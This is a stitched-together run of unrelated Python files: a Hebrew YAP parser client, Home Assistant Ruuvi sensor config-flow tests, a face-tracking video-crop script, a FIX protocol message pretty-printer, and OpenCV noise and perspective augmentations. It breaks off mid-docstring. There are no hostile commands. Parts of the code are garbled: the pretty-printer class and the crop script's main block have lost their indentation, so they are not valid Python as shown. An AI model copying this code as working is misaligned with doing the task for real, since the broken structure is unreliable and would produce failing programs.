        return dep_tree.fillna(-1), md_lattice.fillna(-1), ma_lattice.fillna(-1)
    def parse_dep_tree(self, v:str):
        """Parse the dependency-tree CONLLU string into a DataFrame."""
        data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
        labels=[yap_cols.num.name, yap_cols.word.name, yap_cols.lemma.name, yap_cols.pos.name, yap_cols.pos_2.name,
                yap_cols.empty.name, yap_cols.dependency_arc.name, yap_cols.dependency_part.name,
                yap_cols.dependency_arc_2.name, yap_cols.dependency_part_2.name]
        # remove first line which is empty
        data=[l for l in data if len(l)!=1 ]
        # remove stop char
        new_data = []
        for row in data:
            n_row = [word.replace("\r","") for word in row]
            new_data.append(n_row)
        df=pd.DataFrame.from_records(new_data, columns=labels)
        # Case YAP find punctuation chars like ',', '.', YAP set no lemma for them.
        # That case set the word to be its own lemma
        df.loc[df[yap_cols.lemma.name] == '', [yap_cols.lemma.name]] =df[yap_cols.word.name]
        return df
    def parse_md_lattice(self, v:str):
        """Parse the morphological-disambiguation lattice CONLLU string into a
        DataFrame, exploding the key=value feature column into named columns."""
        data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
        labels=[yap_cols.num.name, yap_cols.num_2.name,yap_cols.word.name, yap_cols.lemma.name,
                yap_cols.pos.name, yap_cols.pos_2.name,
                # parts:
                yap_cols.gen.name,
                yap_cols.num_last.name,
                yap_cols.num_s_p.name, yap_cols.per.name, yap_cols.tense.name ]
        list_of_dict=[]
        for row in data:
            # Skip empty separator lines.
            if len(row)==1:
                continue
            if len(row)!=8:
                raise Exception("Len of row is: {} row: {}".format(len(row), row))
            _dict={
                yap_cols.num.name:None,
                yap_cols.num_2.name:None,
                yap_cols.word.name:None,
                yap_cols.empty.name:None,
                yap_cols.pos.name:None,
                yap_cols.pos_2.name:None,
                yap_cols.gen.name:None,
                yap_cols.num_s_p.name:None,
                yap_cols.per.name:None,
                yap_cols.tense.name:None,
                yap_cols.num_last.name:None
                }
            for i,tag in enumerate( row):
                # Columns 0-5 and 7 map directly; column 6 holds pipe-separated
                # key=value morphological features that are split out below.
                if i<6 or i==7:
                    _dict[labels[i]]=tag
                else:
                    for part in tag.split("|"):
                        if part.split("=")[0]==yap_cols.gen.name:
                            _dict[yap_cols.gen.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.per.name:
                            _dict[yap_cols.per.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.tense.name:
                            _dict[yap_cols.tense.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.num.name:
                            _dict[yap_cols.num_s_p.name]=part.split("=")[1]
            list_of_dict.append(_dict)
        df=pd.DataFrame(list_of_dict)
        return df
    def parse_ma_lattice(self, v:str):
        """Parse the morphological-analysis lattice CONLLU string into a
        DataFrame, including suffix gender/number/person features."""
        data=[sub.split("\t") for item in str(v).split("\n\n") for sub in item.split("\n")]
        labels=[yap_cols.num.name,
                yap_cols.num_2.name,
                yap_cols.word.name,
                yap_cols.lemma.name,
                yap_cols.empty.name,
                yap_cols.pos.name,
                yap_cols.pos_2.name,
                # parts:
                yap_cols.gen.name,
                # Should remain on #7 position.
                yap_cols.num_last.name,
                yap_cols.num_s_p.name, yap_cols.per.name,
                yap_cols.tense.name,
                yap_cols.suf_gen.name,
                yap_cols.suf_num.name,
                yap_cols.suf_per.name
                ]
        list_of_dict=[]
        for row in data:
            # Skip empty separator lines.
            if len(row)==1:
                continue
            if len(row)!=8:
                raise Exception("Len of row is: {} row: {}".format(len(row), row))
            _dict={
                yap_cols.num.name:None,
                yap_cols.num_2.name:None,
                yap_cols.word.name:None,
                yap_cols.lemma.name:None,
                yap_cols.empty.name:None,
                yap_cols.pos.name:None,
                yap_cols.pos_2.name:None,
                yap_cols.gen.name:None,
                yap_cols.num_s_p.name:None,
                yap_cols.per.name:None,
                yap_cols.tense.name:None,
                yap_cols.num_last.name:None,
                yap_cols.suf_gen.name:None,
                yap_cols.suf_num.name:None,
                yap_cols.suf_per.name:None
                }
            for i,tag in enumerate( row):
                # Columns 0-5 and 7 map directly; column 6 holds pipe-separated
                # key=value morphological features that are split out below.
                if i<6 or i==7:
                    _dict[labels[i]]=tag
                else:
                    for part in tag.split("|"):
                        if part.split("=")[0]==yap_cols.gen.name:
                            _dict[yap_cols.gen.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.per.name:
                            _dict[yap_cols.per.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.tense.name:
                            _dict[yap_cols.tense.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.num.name:
                            _dict[yap_cols.num_s_p.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.suf_gen.name:
                            _dict[yap_cols.suf_gen.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.suf_num.name:
                            _dict[yap_cols.suf_num.name]=part.split("=")[1]
                        elif part.split("=")[0]==yap_cols.suf_per.name:
                            _dict[yap_cols.suf_per.name]=part.split("=")[1]
            list_of_dict.append(_dict)
        df=pd.DataFrame(list_of_dict)
        return df
    def print_in_conllu_format(self, rspns:dict):
        """Print each response section in CONLLU format, line by line.

        NOTE(review): new_dict is built but never returned — the method
        implicitly returns None; confirm this is intentional.
        """
        new_dict={}
        for k,v in rspns.items():
            new_dict[k]=[]
            print("")
            print(k)
            for item in str( v).split("\n\n"):
                for sub_item in item.split("\n"):
                    if sub_item!="":
                        print(sub_item)
                        new_dict[k].append(sub_item)
if __name__ == '__main__':
    # Demo entry point: parse a sample Hebrew text against a local YAP server.
    # The text to be processed.
    text = "עכשיו אני מרגיש כאילו לא יודע כלום עכשיו אני מחיש את צעדיי היא מסתכלת בחלון רואה אותי עובר בחוץ היא לא יודעת מה עובר עליי. \
בתוך עיניה הכחולות ירח חם תלוי, עכשיו היא עצובה כמוני בוודאי היא מוציאה את בגדיי אוכלת לבדה ת'תות \
היא לא יודעת, מה עובר עליי. \
אמנם אין אהבה שאין לה סוף אבל הסוף הזה נראה לי מקולל הולך בין האנשים ברחוב צועק או או או או או או \
תגידו לה."
    # IP of YAP server, if locally installed then '127.0.0.1'
    ip='127.0.0.1:8000'
    yap=YapApi()
    # run() returns all six artifacts: tokens, segments, lemmas and the three lattices.
    tokenized_text, segmented_text, lemmas, dep_tree, md_lattice, ma_lattice=yap.run(text, ip)
    print(tokenized_text)
    print(segmented_text)
    print(lemmas)
    print(dep_tree.to_string())
    print(md_lattice)
    print(ma_lattice)
    print('Program end')
|
<reponame>sergioisidoro/hass-ruuvi
"""Tests for the config flow."""
from unittest import mock
from homeassistant.const import CONF_MAC, CONF_NAME, CONF_PATH
from pytest_homeassistant_custom_component.common import AsyncMock, patch, MockConfigEntry
from custom_components.ruuvi import config_flow
from custom_components.ruuvi.const import DOMAIN
async def test_flow_user_init(hass):
    """Test the initialization of the form in the first step of the config flow."""
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": "user"}
    )
    # Note, the user step is now empty, which will later be used to
    # choose between Gateway and Ruuvi Sensors. Right now we get
    # forwarded right away to the Add Sensor step.
    expected = {
        "data_schema": config_flow.CONFIG_FLOW_RUUVI_ADD_SCHEMA,
        "description_placeholders": None,
        "errors": {},
        "flow_id": mock.ANY,
        "handler": "ruuvi",
        "step_id": "add_sensor",
        "type": "form",
    }
    assert expected == result
async def test_flow_add_sensor_data_valid(hass):
    """Test we advance to the sensor-configuration step when a valid sensor is submitted."""
    _result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": "add_sensor"}
    )
    # Submitting MAC + name should move the flow to the config_sensor form.
    result = await hass.config_entries.flow.async_configure(
        _result["flow_id"], user_input={CONF_MAC: "MA:CA:DD:RE:SS:00", CONF_NAME: "Sauna"}
    )
    assert "config_sensor" == result["step_id"]
    assert "form" == result["type"]
@patch('custom_components.ruuvi.sensor.RuuviTagClient')
async def test_flow_configure_sensor_data_valid(_ruuvi_tag_client, hass):
    """Test that selecting sensor conditions advances to the add_another step."""
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": "user"}
    )
    # First submit the sensor identity (MAC + name)...
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], user_input={CONF_MAC: "MA:CA:DD:RE:SS:00", CONF_NAME: "Sauna"}
    )
    # ...then enable every available measurement condition.
    result = await hass.config_entries.flow.async_configure(
        result["flow_id"], user_input={
          "temperature": True,
          "humidity": True,
          "pressure": True,
          "acceleration": True,
          "acceleration_x": True,
          "acceleration_y": True,
          "acceleration_z": True,
          "battery": True,
          "movement_counter": True
        }
    )
    assert "add_another" == result["step_id"]
    assert "form" == result["type"]
async def test_flow_add_another_data_valid(hass):
    """Test that choosing to add another sensor loops back to the add_sensor step."""
    _result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": "add_another"}
    )
    result = await hass.config_entries.flow.async_configure(
        _result["flow_id"], user_input={"add_another": True}
    )
    assert "add_sensor" == result["step_id"]
    assert "form" == result["type"]
@patch('custom_components.ruuvi.sensor.RuuviTagClient')
async def test_flow_complete(_ruuvi_tag_client, hass):
    """Test the flow creates a config entry when the user declines to add another sensor."""
    _result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": "add_another"}
    )
    result = await hass.config_entries.flow.async_configure(
        _result["flow_id"], user_input={"add_another": False}
    )
    assert "create_entry" == result["type"]
import face_alignment
import skimage.io
import numpy
from argparse import ArgumentParser
from skimage import img_as_ubyte
from skimage.transform import resize
from tqdm import tqdm
import os
import imageio
import numpy as np
import warnings
warnings.filterwarnings("ignore")
def extract_bbox(frame, fa):
    """Run the face detector on one frame, downscaling large frames first.

    Returns detected boxes rescaled back to the original resolution, or []
    when no face is found.
    """
    longest_side = max(frame.shape[0], frame.shape[1])
    if longest_side > 640:
        # Detector works on images up to 640px on the long side; remember the
        # factor so boxes can be mapped back to the original frame.
        scale_factor = longest_side / 640.0
        new_shape = (int(frame.shape[0] / scale_factor), int(frame.shape[1] / scale_factor))
        frame = img_as_ubyte(resize(frame, new_shape))
    else:
        scale_factor = 1
    frame = frame[..., :3]
    detections = fa.face_detector.detect_from_image(frame)
    if len(detections) == 0:
        return []
    # Drop the trailing confidence column and undo the downscale.
    return np.array(detections)[:, :-1] * scale_factor
def bb_intersection_over_union(boxA, boxB):
    """Intersection-over-union of two inclusive pixel boxes (x1, y1, x2, y2)."""
    # Overlap rectangle; inclusive pixel coordinates explain the +1 terms.
    overlap_left = max(boxA[0], boxB[0])
    overlap_top = max(boxA[1], boxB[1])
    overlap_right = min(boxA[2], boxB[2])
    overlap_bottom = min(boxA[3], boxB[3])
    inter_area = max(0, overlap_right - overlap_left + 1) * max(0, overlap_bottom - overlap_top + 1)
    area_a = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
    area_b = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
    # Union = sum of areas minus the double-counted intersection.
    return inter_area / float(area_a + area_b - inter_area)
def join(tube_bbox, bbox):
    """Smallest axis-aligned box covering both input boxes (x1, y1, x2, y2)."""
    paired = list(zip(tube_bbox, bbox))
    # Mins for the top-left corner, maxes for the bottom-right corner.
    return (min(paired[0]), min(paired[1]), max(paired[2]), max(paired[3]))
def compute_bbox(start, end, fps, tube_bbox, frame_shape, inp, image_shape, increase_area=0.1):
    """Build the ffmpeg command that crops one face trajectory into a clip.

    start/end are frame indices, converted to seconds via fps; tube_bbox is
    the (left, top, right, bottom) union box of the trajectory.
    """
    left, top, right, bot = tube_bbox
    width = right - left
    height = bot - top
    # Aspect-preserving padding: the shorter side is grown more so the
    # expanded crop tends towards the target aspect ratio.
    width_increase = max(increase_area, ((1 + 2 * increase_area) * height - width) / (2 * width))
    height_increase = max(increase_area, ((1 + 2 * increase_area) * width - height) / (2 * height))
    left = int(left - width_increase * width)
    top = int(top - height_increase * height)
    right = int(right + width_increase * width)
    bot = int(bot + height_increase * height)
    # Clamp the expanded box to the frame bounds.
    top = max(0, top)
    bot = min(bot, frame_shape[0])
    left = max(0, left)
    right = min(right, frame_shape[1])
    h = bot - top
    w = right - left
    start_sec = start / fps
    duration = end / fps - start_sec
    scale = f'{image_shape[0]}:{image_shape[1]}'
    return f'ffmpeg -i {inp} -ss {start_sec} -t {duration} -filter:v "crop={w}:{h}:{left}:{top}, scale={scale}" crop.mp4'
def compute_bbox_trajectories(trajectories, fps, frame_shape, args):
    """Turn each sufficiently long trajectory into an ffmpeg crop command.

    Trajectories shorter than args.min_frames are dropped.
    """
    return [
        compute_bbox(start, end, fps, tube_bbox, frame_shape, inp=args.inp,
                     image_shape=args.image_shape, increase_area=args.increase)
        for (bbox, tube_bbox, start, end) in trajectories
        if (end - start) >= args.min_frames
    ]
def process_video(args):
    """Track faces through a video and return ffmpeg crop commands, one per
    face trajectory that survives the min-frames filter.
    """
    device = 'cpu' if args.cpu else 'cuda'
    fa = face_alignment.FaceAlignment(face_alignment.LandmarksType._2D, flip_input=False, device=device)
    video = imageio.get_reader(args.inp)
    # Each trajectory is a mutable list: [initial_bbox, union_bbox, start_frame, end_frame].
    trajectories = []
    previous_frame = None
    if args.input_type=='video':
        fps = video.get_meta_data()['fps']
    else:
        fps=1
    commands = []
    try:
        for i, frame in tqdm(enumerate(video)):
            frame_shape = frame.shape
            bboxes =  extract_bbox(frame, fa)
            ## For each trajectory check the criterion
            not_valid_trajectories = []
            valid_trajectories = []
            for trajectory in trajectories:
                tube_bbox = trajectory[0]
                intersection = 0
                for bbox in bboxes:
                    intersection = max(intersection, bb_intersection_over_union(tube_bbox, bbox))
                if intersection > args.iou_with_initial:
                    valid_trajectories.append(trajectory)
                else:
                    not_valid_trajectories.append(trajectory)
            # Trajectories that lost their face are finalized into commands now.
            commands += compute_bbox_trajectories(not_valid_trajectories, fps, frame_shape, args)
            trajectories = valid_trajectories
            ## Assign bbox to trajectories, create new trajectories
            for bbox in bboxes:
                intersection = 0
                current_trajectory = None
                # Pick the live trajectory with the highest IoU above threshold.
                for trajectory in trajectories:
                    tube_bbox = trajectory[0]
                    current_intersection = bb_intersection_over_union(tube_bbox, bbox)
                    if intersection < current_intersection and current_intersection > args.iou_with_initial:
                        intersection = bb_intersection_over_union(tube_bbox, bbox)
                        current_trajectory = trajectory
                ## Create new trajectory
                if current_trajectory is None:
                    trajectories.append([bbox, bbox, i, i])
                else:
                    # Extend the matched trajectory in time and grow its union box.
                    current_trajectory[3] = i
                    current_trajectory[1] = join(current_trajectory[1], bbox)
    except IndexError as e:
        raise (e)
    # Finalize trajectories still alive at end-of-video.
    commands += compute_bbox_trajectories(trajectories, fps, frame_shape, args)
    return commands
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--image_shape", default=(256, 256), type=lambda x: tuple(map(int, x.split(','))),
help="Image shape")
parser.add_argument("--increase", default=0.1, type=float, help='Increase bbox by this amount')
parser.add_argument("--iou_with_initial", type=float, default=0.25, help="The minimal allowed iou with inital bbox")
parser.add_argument("--inp", required=True, help='Input image or video')
parser.add_argument("--min_frames", type=int, default=0, help='Minimum number of frames')
parser.add_argument("--cpu", dest="cpu", action="store_true", help="cpu mode.")
parser.add_argument("--input_type", required=True, help='image or video')
args = parser.parse_args()
commands = process_video(args)
for command in commands:
print (command)
|
<filename>tagvalueprettyprinter/PrettyPrinter.py<gh_stars>1-10
class PrettyPrinter():
def __init__(self):
'''Initialize fix with fcgm properties'''
from pyfixorchestra import FixDictionary
field = FixDictionary('fields')
self.fields = (field.generateDictionary()) # [names, temp]
component = FixDictionary('components')
self.components = (component.generateDictionary()) # [names, miniIDs, miniGroup, miniComp, temp]
group = FixDictionary('groups')
self.groups = (group.generateDictionary()) # [names, numInGroup, miniIDs, miniGroup, miniComp, temp]
message = FixDictionary('messages')
self.messages = (message.generateDictionary()) # [names, miniIDs, miniGroup, miniComp, temp]
self.level = 1
self.context_list = [] # List of IDs that define context.
self.context = [] # List of 2 items - tag, type(ie mcgf)
self.allowed = [] # List of lists of allowed field,group,comp,numingrp
self.output_string = [] # tag value level
def get_allowed(self):
'''Takes current context value and type, and returns allowed fields, groups and components'''
context = self.context[0]
feature = self.context[1]
if feature == 'm':
allowed_fields = self.messages[context][1]
allowed_groups = self.messages[context][2]
allowed_comps = self.messages[context][3]
allowed_numingroup = []
elif feature == 'c':
allowed_fields = self.components[context][1]
allowed_groups = self.components[context][2]
allowed_comps = self.components[context][3]
allowed_numingroup = []
else:
allowed_numingroup = self.groups[context][1]
allowed_fields = self.groups[context][2]
allowed_groups = self.groups[context][3]
allowed_comps = self.groups[context][4]
return ([allowed_fields, allowed_groups,allowed_comps, allowed_numingroup])
def check_in_subfields(self, tv):
'''Checks if the tag is in currently allowed fields'''
return (tv[0] in self.allowed[0], '0')
def check_in_subcomponents(self, tv):
'''Checks if the tag is inside currently allowed components'''
for c in self.allowed[2]:
if tv[0] in self.components[c][1]: # If tag is in component's fields
return (True, c) # Return true and the component that contains this tag
return (False, '0')
def check_in_subgroups(self, tv):
'''Checks if the tag is a numingroup inside currently allowed groups'''
for g in self.allowed[1]:
if tv[0] in self.groups[g][1]: # If tag is in groups's numingroup
return (True, g) # Return true and the group that contains this tag
return (False, '0')
def check_in_subs(self, tv):
'''checks for tv in fields, subcomponents, subgroups. Appends output_str and returns True if found'''
in_sub_field = self.check_in_subfields(tv)
in_sub_comp = self.check_in_subcomponents(tv)
in_sub_group = self.check_in_subgroups(tv)
# Check in sub fields
if in_sub_field[0]:
self.out(tv, self.level,'field')
return True
# Check in sub components
elif in_sub_comp[0]:
self.level += 1
self.context = [in_sub_comp[1], 'c']
self.context_list.append(self.context)
self.allowed = self.get_allowed()
self.out(tv, self.level,'component',self.components[self.context[0]][0])
return True
# Check in sub group
elif in_sub_group[0]:
self.level += 1
self.context = [in_sub_group[1], 'g']
self.context_list.append(self.context)
self.allowed = self.get_allowed()
self.out(tv, self.level-1,'numingrp',self.groups[self.context[0]][0])
return True
else:
return False
def out(self, tv, level, typee, name = None):
'''Appends tag, value, level, type and name to tag value list'''
tv.append(level)
tv.append(typee)
if name:
tv.append(name)
self.output_string.append(tv)
    def get_level(self, msg):
        '''Takes in 1 line of FIX message as list of lists, returns list of lists with levels appended'''
        # flag35 flips to True once tag 35 (MsgType) has been seen; everything
        # up to and including tag 35 is emitted as StandardHeader content.
        flag35 = False
        for tv in msg:
            # For StandardHeader - level = 1. Level is appended to tag value list, index 2
            if not flag35:
                self.out(tv, self.level, 'component')
                # msgtype - sets context based on msgname, gets allowed fgc
                if tv[0] == '35':
                    flag35 = True
                    self.context = [tv[1], 'm'] # type - message
                    self.context_list.append(self.context)
                    self.allowed = self.get_allowed()
            if flag35 and tv[0] != '35':
                bol = self.check_in_subs(tv)
                # Go back one context if tag not found in current context
                # Setting a count to avoid infinite loops
                ct = 1
                while not bol and ct < 30:
                    ct += 1
                    self.level -= 1
                    if self.level < 1:
                        # Backtracked past the message root: the tag does not
                        # fit anywhere in the dictionary; give up on it.
                        print(f'Out of bounds! Check tag {tv[0]}')
                        break
                    # Pop back to the enclosing context and retry the lookup.
                    self.context_list.pop()
                    self.context = self.context_list[-1]
                    self.allowed = self.get_allowed()
                    bol = self.check_in_subs(tv)
        return(self.output_string)
def prettify(self,logfile):
'''COnsolidated function. Takes logfine as input, pretty prints messages'''
outp = self.parse(logfile)
self.prettyprint(outp)
def parse(self, logfile):
'''Parses log file, returns list of tag values in list of tag value lines'''
with open(logfile, 'r') as f:
lines = f.readlines()
delim = self.get_delim(lines)
tagvalue_lines = []
for line in lines:
line = line.replace('\u2028447','') # Replaces this pesky unicode
strt_idx = line.find('8=FIX')
line=line[strt_idx:]
columns = line.split(delim)
tagvalue = []
for col in columns:
values = col.split('=')
if len(values) > 1: # This ignores all \n
tagvalue.append([values[0],values[1]])
tagvalue_lines.append(tagvalue)
return tagvalue_lines
def get_delim(self, lines):
'''Finds delimiter for given FIX messages'''
i = 0
delim = ''
while delim not in ['<SOH>',':',';','^',' ','|'] and i<10:
try:
if '<SOH>' in lines[i]:
delim = '<SOH>'
else:
delim_idx = lines[i].rfind('10=')
delim = lines[i][delim_idx-1]
except:
print("Error: couldn't find delimiter in line ", i)
i+=1
return delim
    def prettyprint(self,tagvalue_lines):
        '''Takes in levels, types and name for tags and values, prints output.

        Each message is annotated with nesting levels via self.get_level and
        printed one tag per line, indented by its level, with component and
        group headers inserted where a new context starts.
        '''
        for line in tagvalue_lines:
            print() # Blank line
            print('New message')
            print('\t--- StandardHeader component')
            # get_level mutates self.level/context while annotating the line.
            line_with_level = self.get_level(line)
            for tagvalue in line_with_level:
                try:
                    key = tagvalue[0]
                    level = tagvalue[2]
                    # Human-readable field name from the dictionary.
                    keyname = self.fields[key][0]
                    if key == '35': # If message
                        try:
                            msg_name = self.messages[tagvalue[1]][0]
                            print(level*'\t'+' '+f'{keyname}({key}) = {msg_name}({tagvalue[1]})')
                        except KeyError:
                            # Unknown MsgType value: fall back to the raw value.
                            print(f'No message name listed for 35 = {tagvalue[1]}')
                            print(level*'\t'+f'{keyname}({key}) = ({tagvalue[1]})')
                    else:
                        # Printing components
                        if tagvalue[3] == 'component':
                            if level <= 1: # Applicable to level 1 components only
                                level = 2
                            if len(tagvalue)>4:
                                print((level-1)*'\t'+f'--- {tagvalue[4]} component') # Component name
                            print((level-1)*'\t'+' '+f'{keyname}({key}) = {tagvalue[1]}')
                        # Printing groups
                        elif tagvalue[3] == 'numingrp':
                            print(level*'\t'+f'--- {tagvalue[4]} group') # Group name
                            print(level*'\t'+f'{keyname}({key}) = {tagvalue[1]}')
                        else:
                            print(level*'\t'+f'{keyname}({key}) = {tagvalue[1]}')
                # NOTE(review): bare except hides IndexError/KeyError from
                # malformed rows, and `key` may be unbound here when the very
                # first row of a message is empty — consider narrowing.
                except:
                    print(f'key name not found for tag {key}')
            self.level = 1 # reset level after every message
# ---------------------------------------------------------------------------
# File: codes/dataops/opencv_transforms/opencv_transforms/extra_functional.py (gh_stars: 1-10)
# from __future__ import division
import math
import random
from warnings import warn

import cv2
import numpy as np
#import torch

#import numbers
#import types
#import collections
from .common import preserve_shape, preserve_type, preserve_channel_dim, _maybe_process_in_chunks, polar2z, norm_kernel
from .common import _cv2_str2interpolation, _cv2_interpolation2str, MAX_VALUES_BY_DTYPE
## Below are new augmentations not available in the original ~torchvision.transforms
@preserve_type
def perspective(img, fov=45, anglex=0, angley=0, anglez=0, shear=0,
                translate=(0, 0), scale=(1, 1), resample='BILINEAR', fillcolor=(0, 0, 0)):
    r"""
    This function is partly referred to in
    https://blog.csdn.net/dcrmg/article/details/80273818

    Applies a 2D affine transform (anisotropic scale, shear and in-plane
    rotation about the image center, plus translation) composed with a 3D
    perspective projection (rotations around the x/y axes viewed with the
    given field of view).

    Args:
        img (numpy ndarray): image to transform (HxW grayscale or HxWxC).
        fov (float): field of view in degrees; controls perspective strength.
        anglex (float): 3D rotation around the x axis, in degrees.
        angley (float): 3D rotation around the y axis, in degrees.
        anglez (float): in-plane rotation, in degrees.
        shear (float): shear angle, in degrees.
        translate (tuple): (tx, ty) translation in pixels.
        scale (tuple): (sx, sy) scale factors.
        resample (str): interpolation mode name (key into _cv2_str2interpolation).
        fillcolor (tuple): border fill color for areas outside the source image.
    Returns:
        numpy ndarray: warped image with the same size as the input.
    """
    gray_scale = False
    if len(img.shape) == 2:
        gray_scale = True
        # Work in 3 channels; converted back to grayscale before returning.
        img = cv2.cvtColor(img, cv2.COLOR_GRAY2RGB)
    h, w, _ = img.shape
    centery = h * 0.5
    centerx = w * 0.5
    alpha = math.radians(shear)
    beta = math.radians(anglez)
    lambda1 = scale[0]
    lambda2 = scale[1]
    tx = translate[0]
    ty = translate[1]
    sina = math.sin(alpha)
    cosa = math.cos(alpha)
    sinb = math.sin(beta)
    cosb = math.cos(beta)
    # 2x3 affine coefficients combining rotation (beta), shear (alpha) and
    # scale, expressed about the image center, with translation (tx, ty).
    M00 = cosb * (lambda1 * cosa ** 2 + lambda2 * sina ** 2) - sinb * (lambda2 - lambda1) * sina * cosa
    M01 = - sinb * (lambda1 * sina ** 2 + lambda2 * cosa ** 2) + cosb * (lambda2 - lambda1) * sina * cosa
    M10 = sinb * (lambda1 * cosa ** 2 + lambda2 * sina ** 2) + cosb * (lambda2 - lambda1) * sina * cosa
    M11 = + cosb * (lambda1 * sina ** 2 + lambda2 * cosa ** 2) + sinb * (lambda2 - lambda1) * sina * cosa
    M02 = centerx - M00 * centerx - M01 * centery + tx
    M12 = centery - M10 * centerx - M11 * centery + ty
    affine_matrix = np.array([[M00, M01, M02], [M10, M11, M12], [0, 0, 1]], dtype=np.float32)
    # -------------------------------------------------------------------------------
    # Perspective part: rotate the 4 image corners in 3D, then project them
    # back onto the image plane. z is the viewing distance implied by fov.
    z = np.sqrt(w ** 2 + h ** 2) / 2 / np.tan(math.radians(fov / 2))
    radx = math.radians(anglex)
    rady = math.radians(angley)
    sinx = math.sin(radx)
    cosx = math.cos(radx)
    siny = math.sin(rady)
    cosy = math.cos(rady)
    # Homogeneous 3D rotation matrix for the x/y rotations.
    r = np.array([[cosy, 0, -siny, 0],
                  [-siny * sinx, cosx, -sinx * cosy, 0],
                  [cosx * siny, sinx, cosx * cosy, 0],
                  [0, 0, 0, 1]])
    pcenter = np.array([centerx, centery, 0, 0], np.float32)
    # The 4 image corners relative to the center.
    p1 = np.array([0, 0, 0, 0], np.float32) - pcenter
    p2 = np.array([w, 0, 0, 0], np.float32) - pcenter
    p3 = np.array([0, h, 0, 0], np.float32) - pcenter
    p4 = np.array([w, h, 0, 0], np.float32) - pcenter
    dst1 = r.dot(p1)
    dst2 = r.dot(p2)
    dst3 = r.dot(p3)
    dst4 = r.dot(p4)
    list_dst = [dst1, dst2, dst3, dst4]
    org = np.array([[0, 0],
                    [w, 0],
                    [0, h],
                    [w, h]], np.float32)
    dst = np.zeros((4, 2), np.float32)
    # Perspective-divide each rotated corner back onto the image plane.
    for i in range(4):
        dst[i, 0] = list_dst[i][0] * z / (z - list_dst[i][2]) + pcenter[0]
        dst[i, 1] = list_dst[i][1] * z / (z - list_dst[i][2]) + pcenter[1]
    perspective_matrix = cv2.getPerspectiveTransform(org, dst)
    # Compose: affine first, then perspective.
    total_matrix = perspective_matrix @ affine_matrix
    result_img = cv2.warpPerspective(img, total_matrix, (w, h), flags=_cv2_str2interpolation[resample],
                                     borderMode=cv2.BORDER_CONSTANT, borderValue=fillcolor)
    if gray_scale:
        result_img = cv2.cvtColor(result_img, cv2.COLOR_RGB2GRAY)
    return result_img
@preserve_type
def noise_gaussian(img: np.ndarray, mean=0.0, std=1.0, gtype='color'):
    r"""Apply Gaussian noise to the image.

    Note: despite the original "additive" description, the noise is applied
    multiplicatively: ``out = clip((1 + N(mean, std)) * img, 0, 255)``.

    Args:
        img (numpy ndarray): image to be augmented.
        mean (float): mean ("centre") of the Gaussian distribution. Default=0.0
        std (float): standard deviation (spread or "width") of the Gaussian
            distribution. Default=1.0
        gtype (str: ``color`` or ``bw``): ``color`` draws independent noise per
            channel; ``bw`` draws one channel shared across all channels.
    Returns:
        numpy ndarray: version of the image with Gaussian noise applied.
    """
    height, width, channels = img.shape
    noise_channels = 1 if gtype == 'bw' else channels
    gauss = np.random.normal(
        loc=mean, scale=std, size=(height, width, noise_channels)).astype(np.float32)
    return np.clip((1 + gauss) * img.astype(np.float32), 0, 255)
@preserve_type
def noise_poisson(img):
    r"""Apply Poisson (shot) noise to the image.

    Important: Poisson noise is not additive like Gaussian; it depends on the
    image values themselves. Read:
    https://tomroelandts.com/articles/gaussian-noise-is-added-poisson-noise-is-applied

    Args:
        img (numpy ndarray): image to be augmented.
    Returns:
        numpy ndarray: version of the image with Poisson noise applied.
    """
    scaled = img.astype(np.float32) / 255.0
    # Number of distinct intensity levels, rounded up to a power of two,
    # used as the Poisson scaling factor.
    levels = float(2 ** np.ceil(np.log2(len(np.unique(scaled)))))
    sampled = np.random.poisson(scaled.astype(np.float32) * levels) / levels
    return 255 * np.clip(sampled, 0, 1)
@preserve_type
def noise_salt_and_pepper(img, prob=0.01):
    r"""Apply black-and-white "Salt & Pepper" noise to an image.

    Args:
        img (numpy ndarray): image to be augmented.
        prob (float): probability (threshold) that controls the noise level;
            half of it becomes pepper (0), the other half salt (255).
    Returns:
        numpy ndarray: noisy version of the image.
    """
    # One random draw per pixel position, shared across channels, so salt and
    # pepper speckles are black/white rather than colored.
    threshold_map = np.random.rand(img.shape[0], img.shape[1])
    noisy = img.copy()
    noisy[threshold_map < prob / 2] = 0.0        # pepper
    noisy[threshold_map > 1 - prob / 2] = 255.0  # salt
    return noisy
@preserve_type
def noise_speckle(img: np.ndarray, mean=0.0, std=1.0, gtype='color'):
    r"""Apply Speckle (multiplicative Gaussian) noise: ``out = img + img * n``.

    Args:
        img (numpy ndarray): image to be augmented.
        mean (float): mean ("centre") of the distribution. Default=0.0
        std (float): spread of the distribution; the normal draw uses
            ``std ** 0.5`` as its scale. Default=1.0
        gtype (str: ``color`` or ``bw``): ``color`` draws per-channel noise,
            ``bw`` draws a single channel shared by all channels.
    Returns:
        numpy ndarray: version of the image with speckle noise applied.
    """
    height, width, channels = img.shape
    if gtype == 'bw':
        channels = 1
    noise = np.random.normal(
        loc=mean, scale=std ** 0.5, size=(height, width, channels)).astype(np.float32)
    return np.clip(img + img * noise, 0, 255)
@preserve_shape
@preserve_type
def compression(img: np.ndarray, quality=20, image_type='.jpeg'):
    r"""Compress the image using OpenCV.

    Args:
        img (numpy ndarray): Image to be compressed (uint8 or float32).
        quality (int: [0,100]): Compression quality for the image.
            Lower values represent higher compression and lower
            quality. Default=20
        image_type (str): select between '.jpeg' or '.webp'
            compression. Default='.jpeg'.
    Returns:
        numpy ndarray: version of the image with compression artifacts.
